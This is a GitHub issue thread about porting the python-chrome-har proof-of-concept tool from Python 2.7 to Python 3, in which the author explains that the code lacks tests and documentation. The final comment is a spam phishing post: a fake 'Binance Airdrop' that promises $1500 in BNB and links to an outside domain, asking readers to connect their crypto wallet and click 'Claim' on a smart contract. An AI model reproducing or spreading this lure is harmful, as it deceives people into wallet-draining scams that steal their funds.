### ISSUE TITLE
reimplementation in python3.6

### ISSUE THREAD

**Issue by fuuman** [salvadormrf/python-chrome-har#1]
Was there any issue with the implementation in python3 or why you decided to go with python2.7?

**Comment by salvadormrf** [comment]
Hi @fuuman this was a POC for a project that I was working. In the end we went for a more simpler approach. This code is far from being complete/accurate, but can be used as reference. Used python2.7 as the project uses python2.7.

**Comment by fuuman** [comment]
What exactly make this code incomplete or not accurate? I saw in your code some TODOs like adding cookie information to the har log. But that were just 3 or 4 missings values. The current har log seems pretty good to me. What is missing, that you would describe the outputed har file as complete/valid?

**Comment by salvadormrf** [comment]
@fuuman good to know then :) I mean it has no readme, tests, no pep8.. so for for me is "not complete". Feel free to improve it. I will play again with Chrome headless at some point :)

**Comment by fuuman** [comment]
Yeah, okay. But this is just "metadata", not _so_ important for me at that point. Yes, me too. I am waiting for the release at the moment. Would be very nice to generate a full har log via python + chrome headless :)

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
